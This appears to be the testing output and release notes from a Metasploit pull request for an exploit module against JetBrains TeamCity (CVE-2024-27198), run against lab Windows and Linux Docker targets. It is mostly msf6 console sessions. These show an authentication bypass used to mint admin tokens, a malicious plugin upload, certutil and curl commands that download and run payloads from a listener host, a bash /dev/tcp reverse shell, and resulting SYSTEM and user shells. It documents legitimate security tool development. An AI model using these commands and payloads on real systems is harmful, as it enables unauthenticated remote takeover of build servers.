[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.QTlzemMwenc2MF9JSDEzRlByeVlMNGpvWmEw.OWJmNzQ4ZjEtNTUyNy00ZTBmLTgwYzMtZDJjOWQ0ODlmOTIx
[*] Uploading plugin: nlWa0Qlx
[*] Target install path: C:\TeamCity
[*] Target build number: 147512
[*] Target data directory path: C:\ProgramData\JetBrains\TeamCity
[*] Deleting the plugin...
[*] Enabled Plugin UUID: 3fed8a0e-8e21-4b3f-9e39-379ab8f123dd
[*] Disabled Plugin UUID: b1f14027-a7a5-4829-9275-d1add9af7fea
[*] Deleting the authentication token...
[*] Command shell session 19 opened (192.168.101.1:4444 -> 192.168.101.114:57662) at 2024-03-13 18:36:47 +0100
[!] This exploit may require manual cleanup of 'C:\TeamCity\webapps\ROOT\plugins\nlWa0Qlx' on the target
[!] This exploit may require manual cleanup of 'C:\TeamCity\work\Catalina\localhost\ROOT\TC_147512_nlWa0Qlx' on the target
[!] This exploit may require manual cleanup of 'C:\ProgramData\JetBrains\TeamCity\system\caches\plugins.unpacked\nlWa0Qlx' on the target


Shell Banner:
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\TeamCity\bin>
-----


c:\TeamCity\bin>whoami
whoami
nt authority\system

c:\TeamCity\bin>ver
ver

Microsoft Windows [Version 10.0.17763.107]

Target 2 (Windows Command) - Windows Server 2019

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 2
target => 2
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload payload/cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=192.168.101.114 LHOST=192.168.101.1

[*] Command to run on remote host: certutil -urlcache -f http://192.168.101.1:8080/Qy-qOX10kZIXJGk3Q336Lg %TEMP%\vdBJysqwdyV.exe & start /B %TEMP%\vdBJysqwdyV.exe
[*] Fetch handler listening on 192.168.101.1:8080
[*] HTTP server started
[*] Adding resource /Qy-qOX10kZIXJGk3Q336Lg
[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Windows Server 2019.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.NnlqQm16WTJ1cXNhUmUwUXNWTE5QcTZCN1I4.OTZkYTZjZDItMTgxYy00NDdmLThkZGEtZTUwZGYzZWJjYzc4
[*] Uploading plugin: zieNyE3T
[*] Target install path: C:\TeamCity
[*] Target build number: 147512
[*] Target data directory path: C:\ProgramData\JetBrains\TeamCity
[*] Deleting the plugin...
[*] Client 192.168.101.114 requested /Qy-qOX10kZIXJGk3Q336Lg
[*] Sending payload to 192.168.101.114 (Microsoft-CryptoAPI/10.0)
[*] Client 192.168.101.114 requested /Qy-qOX10kZIXJGk3Q336Lg
[*] Sending payload to 192.168.101.114 (CertUtil URL Agent)
[*] Enabled Plugin UUID: bb251783-a281-41ba-aa3b-b02d36cec551
[*] Sending stage (201798 bytes) to 192.168.101.114
[*] Disabled Plugin UUID: e84286be-4ba9-42f7-be80-494f7583cd53
[*] Deleting the authentication token...
[+] Deleted C:\TeamCity\work\Catalina\localhost\ROOT\TC_147512_zieNyE3T
[*] Meterpreter session 20 opened (192.168.101.1:4444 -> 192.168.101.114:57673) at 2024-03-13 18:38:30 +0100
[!] This exploit may require manual cleanup of 'C:\ProgramData\JetBrains\TeamCity\system\caches\plugins.unpacked\zieNyE3T' on the target

meterpreter > sysinfo
Computer        : DC02
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 8
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Target 0 (Java) - Linux (Docker) - Windows Server 2019

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=127.0.0.1 LHOST=192.168.101.1

[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.cm5TTl9uRE1RSUExWVZ6ODBRZTVaWHZMTnJJ.YzFlY2Y4NzctYmFiYy00ZTkyLTk2YWYtOTg2YWVhNDYxN2Nl
[*] Uploading plugin: TyctKoBN
[*] Sending stage (57971 bytes) to 192.168.101.1
[*] Target install path: /opt/teamcity
[*] Target build number: 147512
[*] Target data directory path: /data/teamcity_server/datadir
[*] Deleting the plugin...
[*] Enabled Plugin UUID: af42b0fb-79e2-4f94-8bcf-136aec500dff
[*] Meterpreter session 2 opened (192.168.101.1:4444 -> 192.168.101.1:55097) at 2024-03-13 13:04:29 +0100
[*] Disabled Plugin UUID: 37d9471d-75ca-4afe-90bc-edcfb0877ce6
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of '/opt/teamcity/webapps/ROOT/plugins/TyctKoBN' on the target
[!] This exploit may require manual cleanup of '/opt/teamcity/work/Catalina/localhost/ROOT/TC_147512_TyctKoBN' on the target
[!] This exploit may require manual cleanup of '/data/teamcity_server/datadir/system/caches/plugins.unpacked/TyctKoBN' on the target

meterpreter > getuid
Server username: tcuser
meterpreter > sysinfo
Computer        : 03456a935523
OS              : Linux 6.6.12-linuxkit (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux

Target 1 (Java Server Page) - Linux (Docker)

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 1
target => 1
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload payload/java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=127.0.0.1 LHOST=192.168.101.1

[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.d1JMdnR4bUtpVGlkajluOFZmN0FnejZ1aXVN.OGRmNTk0ZmEtNjliOC00N2ZlLTk3NzgtZDNkZDAwM2ZlOTQy
[*] Uploading plugin: ff20gsKg
[*] Target install path: /opt/teamcity
[*] Target build number: 147512
[*] Target data directory path: /data/teamcity_server/datadir
[*] Deleting the plugin...
[*] Enabled Plugin UUID: e0d83eaf-64d4-4c39-a6bc-4d4461d5de8e
[*] Disabled Plugin UUID: 2e1bddd1-6570-4048-981f-565cdcc1e652
[*] Deleting the authentication token...
[+] Deleted /opt/teamcity/webapps/ROOT/plugins/ff20gsKg
[+] Deleted /opt/teamcity/work/Catalina/localhost/ROOT/TC_147512_ff20gsKg
[+] Deleted /data/teamcity_server/datadir/system/caches/plugins.unpacked/ff20gsKg
[*] Command shell session 3 opened (192.168.101.1:4444 -> 192.168.101.1:55129) at 2024-03-13 13:07:59 +0100

id
uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)
uname -a
Linux 03456a935523 6.6.12-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Jan 30 09:48:40 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

Target 3 (Linux Command) - Linux (Docker)

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 3
target => 3
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload payload/cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=127.0.0.1 LHOST=192.168.101.1

[*] Command to run on remote host: curl -so ./kwugWLvQ http://192.168.101.1:8080/yPrBoTF-dOT5qHcUdFGrMQ; chmod +x ./kwugWLvQ; ./kwugWLvQ &
[*] Fetch handler listening on 192.168.101.1:8080
[*] HTTP server started
[*] Adding resource /yPrBoTF-dOT5qHcUdFGrMQ
[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.MlUzUWtlZXJ2ZnN3ZkxITFk0OFM4bGd3Ukd3.MDQ2MDljMGYtYzM3ZC00NzhiLWJiODktOTdmNTUyZmY1ZTBh
[*] Uploading plugin: DQ4F4xGJ
[*] Client 192.168.101.1 requested /yPrBoTF-dOT5qHcUdFGrMQ
[*] Sending payload to 192.168.101.1 (curl/7.68.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.101.1
[*] Meterpreter session 2 opened (192.168.101.1:4444 -> 192.168.101.1:52131) at 2024-03-13 17:08:13 +0100
[*] Target install path: /opt/teamcity
[*] Target build number: 147512
[*] Target data directory path: /data/teamcity_server/datadir
[*] Deleting the plugin...
[*] Enabled Plugin UUID: 65784f5b-ee45-4ae0-ad94-935dff4333b8
[*] Disabled Plugin UUID: 6b6fa68d-0be8-4ded-a951-b9a27296f9d8
[*] Deleting the authentication token...
[!] This exploit may require manual cleanup of '/opt/teamcity/work/Catalina/localhost/ROOT/TC_147512_DQ4F4xGJ' on the target
[!] This exploit may require manual cleanup of '/data/teamcity_server/datadir/system/caches/plugins.unpacked/DQ4F4xGJ' on the target

meterpreter > getuid
Server username: tcuser
meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 20.04 (Linux 6.6.12-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Target 4 (Unix Command) - Linux (Docker)

msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set target 4
target => 4
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set payload payload/cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > exploit verbose=true RHOSTS=127.0.0.1 LHOST=192.168.101.1

[+] bash -c '0<&44-;exec 44<>/dev/tcp/192.168.101.1/4444;sh <&44 >&44 2>&44'
[*] Started reverse TCP handler on 192.168.101.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. JetBrains TeamCity 2023.11.3 (build 147512) running on Linux.
[*] Created authentication token: eyJ0eXAiOiAiVENWMiJ9.UGJGRi1SWnFvQl90bmxGTjJUYmxPVWx0MGQ4.NzczMDExN2EtODZjYi00NTNmLWE2ZTAtMTgyM2YxM2NjZDRm
[*] Uploading plugin: FTC4vpXA
[*] Target install path: /opt/teamcity
[*] Target build number: 147512
[*] Target data directory path: /data/teamcity_server/datadir
[*] Deleting the plugin...
[*] Enabled Plugin UUID: db263177-c19d-4f8a-8fcd-45b5e721adce
[*] Disabled Plugin UUID: 09d76d8e-5e82-4bb9-97c6-982b886cf524
[*] Deleting the authentication token...
[+] Deleted /opt/teamcity/work/Catalina/localhost/ROOT/TC_147512_FTC4vpXA
[+] Deleted /data/teamcity_server/datadir/system/caches/plugins.unpacked/FTC4vpXA
[*] Command shell session 3 opened (192.168.101.1:4444 -> 192.168.101.1:52162) at 2024-03-13 17:09:42 +0100

id
uid=1000(tcuser) gid=1000(tcuser) groups=1000(tcuser)
uname -a
Linux 3a560cc3accb 6.6.12-linuxkit #1 SMP PREEMPT_DYNAMIC Tue Jan 30 09:48:40 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux

[cdelafuente-r7]

Release Notes

This adds an exploit module that leverages an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198) to achieve unauthenticated RCE. The authentication bypass enables to access the REST API and create a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload.